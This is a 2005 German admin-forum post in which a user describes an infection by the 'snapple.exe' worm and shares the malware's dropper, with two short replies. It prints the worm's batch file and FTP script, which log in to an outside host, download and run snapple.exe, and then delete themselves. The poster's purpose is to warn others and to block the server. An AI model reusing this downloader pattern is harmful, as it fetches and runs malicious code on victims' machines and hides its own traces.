haggi
10.05.2005, aktualisiert am 11.05.2005
view6616
view2
0
Goto Top

Trojaner "snapple.exe"

FrageMicrosoft
Hi, alle Viren-Wurm- und Troj.- Geplagten,

habe mir vor ein paar Tagen wegen einer kurzzeitig ausgeschalteten Firewall den "snapple.exe alias syshost.exe"-Wurm eingefangen. Zum Glück hat mein Virenscanner eine Verbreitung auf dem Rechner verhindern können. ABER interessant ist eine batch-Datei im Windows-Ordner, mit der dieses Teil immer wieder geladen werden könnte. Ich gebe sie hier mit der Kommandoerweiterung wieder:

1.bat

@echo off
ftp -n -v -s:.a
snapple.exe
del .a
del /F 1.bat
exit /y

.a

open wowvill.easydns.us 5192
user tr lo.max
binary
GET snapple.exe
bye

Damit wird snapple eingeschleust und gestartet. Da mein Virenscanner den Aufruf snapple.exe gestoppt hatte, haben die Löschbefehle nicht mehr gewirkt.

Also evtl. auch ähnliche Dateien suchen, wenn ein Schädling immer wieder kommt.
Ich habe meine Firewall jedenfalls für den o.g. Server (wowvill....) dicht gemacht.

Gute PC-Gesundheit.

Haggi
ShareTeilen
Auf Facebook teilen Auf Twitter teilen Auf Reddit teilen Auf Linkedin teilen

Content-ID: 10524

Url: https://administrator.de/contentid/10524

Ausgedruckt am: 23.11.2024 um 08:11 Uhr

2 Kommentare
Neuester Kommentar
Goto Top
fritzo
fritzo 10.05.2005 um 23:10:29 Uhr
Goto Top
scheint wohl von Anfängern geschrieben worden zu sein, das Teil. Ein Batchfile als Trigger und Vermehrungsroutine, interessant *grins*
meto
meto 11.05.2005 um 07:13:29 Uhr
Goto Top
Das sehe ich ähnlich. Wenn es einem so leicht gemacht wird, ist man als Admin immer sehr dankbar.
FrageMicrosoft
Mehr von HaggiHaggiDrucken über Netzwerk nicht möglichHaggi - 6 KommentareHaggiProtokollierung wechselnder, an einen DSL-Router angeschlossener RechnerHaggi - 2 KommentareHaggiNeuerdings Freigabeproblem von XP zu VISTAHaggi - 2 KommentareHaggiWas sollen Acl-Files in der System Volume Information?Haggi - 2 Kommentare
Heiß diskutiert
superfun2k24Sophos SFOS 20 DNAT funktioniert nichtsuperfun2k24 - 26 Kommentareuser217Kaufberatung Hardware - Hyper-V Cluster 3 Nodesuser217 - 25 KommentarePharaunIntel-E810 QSFP28 to Mikrotik QSPF+ mit 40Gbit VerbindungPharaun - 24 Kommentareprplemk2Testumgebung bauen (Grundlegend)prplemk2 - 19 KommentareaufdemmarsHP Z620 USB hat kein Strom beim Startenaufdemmars - 17 KommentareTJ.Hooker74Dom.Admin-Passwort ändern - Auswirkungen auf EX, HCW, AADCTJ.Hooker74 - 15 KommentaremaisenkaiserSwitch ohne STP ins Netzwerkmaisenkaiser - 13 KommentareUnluckyProccess1999Creo 4.0 Lizenz Server (LMTOOLS)UnluckyProccess1999 - 13 KommentareJudgelgZertifikate in die Exchange Online GAL hochladenJudgelg - 13 KommentareadmtechEntwicklertagebuch: Release 6.4 - Filteradmtech - 13 KommentareleberkaeseFB7590 ISDN Fax-Funktionleberkaese - 12 KommentareSarekHLLegaler Einsatz vom M365 Family in Business-UmgebungSarekHL - 11 Kommentare